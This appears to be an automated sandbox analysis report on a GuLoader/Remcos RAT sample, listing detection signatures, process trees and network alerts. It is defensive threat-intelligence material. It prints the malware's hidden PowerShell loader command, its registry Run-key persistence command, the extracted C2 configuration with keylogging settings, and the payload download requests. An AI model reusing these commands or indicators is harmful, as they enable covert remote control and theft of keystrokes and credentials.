
Windows Analysis Report
rPO3799039985.exe

Overview

General Information

Sample name: rPO3799039985.exe
Analysis ID: 1553438
MD5: efb9125831992267d27c5dd9a2bdc0be
SHA1: 0be2e44632121c8fc2f325ed4af6b91e49486711
SHA256: 7028c43edb1ed93fee2d535a938b07a687d01cf5a5e4dc9e9104d5fa372089ca

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64native
  • rPO3799039985.exe (PID: 6396 cmdline: "C:\Users\user\Desktop\rPO3799039985.exe" MD5: EFB9125831992267D27C5DD9A2BDC0BE)
    • powershell.exe (PID: 2004 cmdline: powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • msiexec.exe (PID: 5024 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • cmd.exe (PID: 5600 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • reg.exe (PID: 8156 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • chrome.exe (PID: 7732 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: BB7C48CDDDE076E7EB44022520F40F77)
          • chrome.exe (PID: 5764 cmdline: "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=2204,i,2239432924243639277,16353558222963723582,262144 --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)
        • msiexec.exe (PID: 6196 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xocgcuufvngxpkogqqu" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 2092 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hihycffzjvycrqdkhbgvqc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5196 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\rlmjdxqbxdqhcwrorltxbhbpx" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msedge.exe (PID: 4008 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
          • msedge.exe (PID: 5092 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,10008014947784373590,7267593141464040591,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3 MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
  • msedge.exe (PID: 7440 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --do-not-de-elevate MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
    • msedge.exe (PID: 6672 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2444 /prefetch:3 MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
    • identity_helper.exe (PID: 8100 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6276 /prefetch:8 MD5: 688D7C201AD85A9C6EDAFDC457E53219)
    • identity_helper.exe (PID: 4576 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6276 /prefetch:8 MD5: 688D7C201AD85A9C6EDAFDC457E53219)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["87.120.114.20:53279:1"], "Assigned name": "P2-01", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HMKDWQ", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000003.144377552368.0000000005496000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000004.00000003.144376861712.0000000005496000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000004.00000002.148899066974.0000000021140000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
(5 of the 8 memory-dump entries are listed here)

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), CommandLine: powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO3799039985.exe", ParentImage: C:\Users\user\Desktop\rPO3799039985.exe, ParentProcessId: 6396, ParentProcessName: rPO3799039985.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), ProcessId: 2004, ProcessName: powershell.exe
Source: Process started; Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5024, ParentProcessName: msiexec.exe, ProcessCommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 7732, ProcessName: chrome.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: %billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 8156, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Besmears
Source: Process started; Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community; Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5600, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)", ProcessId: 8156, ProcessName: reg.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 104.21.13.139, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5024, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49767
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5024, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)", ProcessId: 5600, ProcessName: cmd.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), CommandLine: powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO3799039985.exe", ParentImage: C:\Users\user\Desktop\rPO3799039985.exe, ParentProcessId: 6396, ParentProcessName: rPO3799039985.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), ProcessId: 2004, ProcessName: powershell.exe

Stealing of Sensitive Information

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 5024, TargetFilename: C:\ProgramData\remcos\logs.dat

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-11T08:10:55.239935+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49769 | 87.120.114.20 | 53279 | TCP
2024-11-11T08:10:56.661525+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49772 | 87.120.114.20 | 53279 | TCP
2024-11-11T08:10:56.677130+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49771 | 87.120.114.20 | 53279 | TCP
2024-11-11T08:10:56.692900+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49770 | 87.120.114.20 | 53279 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-11T08:10:56.725745+0100 | 2803304 | 3 | Unknown Traffic | 192.168.11.20 | 49773 | 178.237.33.50 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-11T08:10:50.401480+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49767 | 104.21.13.139 | 443 | TCP

AV Detection

Source: 00000004.00000003.144377552368.0000000005496000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": ["87.120.114.20:53279:1"], "Assigned name": "P2-01", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HMKDWQ", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: rPO3799039985.exe; Virustotal: Detection: 18%
Source: Yara match; File source: 00000004.00000003.144377552368.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.144376861712.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.148899066974.0000000021140000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.148889275088.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.148892015439.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.144376861712.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: msiexec.exe PID: 5024, type: MEMORYSTR
Source: Yara match; File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: rPO3799039985.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 104.21.13.139:443 -> 192.168.11.20:49767 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.200.96:443 -> 192.168.11.20:49768 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 40.126.29.12:443 -> 192.168.11.20:49785 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 20.190.135.7:443 -> 192.168.11.20:49786 version: TLS 1.2
Source: rPO3799039985.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbO source: powershell.exe, 00000002.00000002.144017518011.000000000303E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb{ source: powershell.exe, 00000002.00000002.144031828230.0000000008A68000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\rPO3799039985.exe; Code function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
Source: C:\Users\user\Desktop\rPO3799039985.exe; Code function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
Source: C:\Users\user\Desktop\rPO3799039985.exe; Code function: 0_2_00402688 FindFirstFileA,0_2_00402688
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 4_2_214D5C00 FindFirstFileW,FindNextFileW,FindNextFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_214D5C00
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 4_2_214D7E20 Sleep,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_214D7E20
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 4_2_214D73F0 FindFirstFileW,FindNextFileW,LdrInitializeThunk,CreateFileW,FindNextFileW,FindClose,CloseHandle,FindClose,4_2_214D73F0
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 4_2_214E8AD0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,4_2_214E8AD0
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 4_2_21DE10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_21DE10F1
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 4_2_21DE6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,4_2_21DE6580
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 9_2_0040AE51 FindFirstFileW,FindNextFileW,9_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 10_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407898
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\Badefaciliteter140\
Source: chrome.exe; Memory has grown: Private usage: 7MB later: 27MB

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49771 -> 87.120.114.20:53279
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49770 -> 87.120.114.20:53279
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49769 -> 87.120.114.20:53279
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49772 -> 87.120.114.20:53279
              Source: Malware configuration extractorIPs: 87.120.114.20
              Source: global trafficTCP traffic: 87.120.114.20 ports 2,3,53279,5,7,9
              Source: global trafficTCP traffic: 192.168.11.20:49769 -> 87.120.114.20:53279
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 104.21.13.139 104.21.13.139
              Source: Joe Sandbox ViewIP Address: 172.67.200.96 172.67.200.96
              Source: Joe Sandbox ViewASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.11.20:49773 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49767 -> 104.21.13.139:443
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214D9293 LdrInitializeThunk,send,send,send,send,send,send,send,send,send,send,LdrInitializeThunk,recv,recv,LdrInitializeThunk,recv,LdrInitializeThunk,setsockopt,ioctlsocket,4_2_214D9293
              Source: global trafficHTTP traffic detected: GET /data-package/kpFdlS7h/download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: filetransfer.ioCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /storage/download/DSOnK3w83O1d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: s20.filetransfer.ioConnection: Keep-AliveCookie: nette-samesite=1; PHPSESSID=cavpeluj70i7r0fo9pbtami48v
